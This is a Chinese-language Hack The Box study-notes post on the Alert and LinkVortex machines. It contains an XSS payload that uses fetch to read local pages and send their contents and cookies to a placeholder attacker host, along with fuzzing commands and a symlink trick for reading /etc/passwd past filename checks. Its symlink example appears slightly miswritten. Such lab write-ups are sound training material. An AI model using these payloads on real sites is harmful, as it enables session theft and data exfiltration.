最近终于有空来玩玩HTB啦,时隔半年的HTB笔记也终于又更新了。本篇靶机为Alert和Linkvortex
xss回连测试与数据带回
可以用下面这段简单测试xss是否存在bot访问从而进行回连
<script>location="http://ip"</script>
如果存在,就可以用fetch进行外带,达到类似CSRF的效果
<script>
var readfile="http://127.0.0.1/index.php";//改一下page就好
fetch(readfile)
.then(response => response.text())
.then(data => {
fetch("http://ip/?data=" + encodeURIComponent(data)+"&cookie="+document.cookie);//改成你的ip
})
.catch(error => fetch("http://ip/?err="+error.message));
</script>
apache2默认配置文件路径
/etc/apache2/sites-available/000-default.conf
.htpasswd
这是一个和.htaccess类似的apache用户级配置文件,可以配合apache认证功能来模拟一个简单的登录认证。这个文件就是用来存放账号密码的。明文,可以直接查看
linpeas参数
-o参数是个很好用的参数,可以指定输出一些东西,因为linpeas的东西实在太杂了
一般intersting_perms_files是个不错的选择
同时,拿到foothood后观察一下127.1的端口也是个很值得关注的点
groups
这是一条指令,可以查看当前用户和所在组。当然如果环境中没有这个软件,也可以用cat /etc/groups | grep "akaRed"
,是等效的
Dockerfile
有时候githack下来的dockerfile会说使用了什么配置文件去build,配置文件里可能会有密码之类的
HOST头FUZZ
有时候需要fuzz子域,但是在不知道的情况下又没dns咋办?去fuzz host头就行
ffuf -u "http://ip" -w /usr/.../dns.txt -H "HOST: FUZZ.???.???" -ac
关于ffuf的使用可以看下面一条。这里也顺便记录一个子域字典吧:/usr/share/dnsenum/dns.txt
不得不说kali的自带字典虽然藏得深但是真的全
ffuf
wfuzz日常没法用的一天= =
现在我投靠了这个新的fuzz工具,一样kali自带
格式如下,很方便很好记
ffuf -u "http://ip/FUZZ" -w /usr/.../dns.txt -fc/-ac
-fc和-ac选一个就行,-fc是过滤你不要的,比如-fc 404
。-ac是自动过滤软件自己觉得没用的
软链接绕过名字检查
好像上一篇HTB记录过,但是上一篇是为了让检测软件误认为自己打开的是pdf实则是我们定向的文件,检测软件并没有对定向过后的文件做检查
但这里要介绍的是,如果做了定向后的检查,只要套了两层软连接,就可以绕过一些文件名检查。这里的漏洞就在于软件一般只追踪一层,而不会去看下一层
比如要你只能打开png图片,那么我只要像下面这样包,就检测不到了
ln -s /etc/passwd 2.png
ln -s 1.png 2.png
小tips
要注意观察每个文件夹的读写执行权限和所属组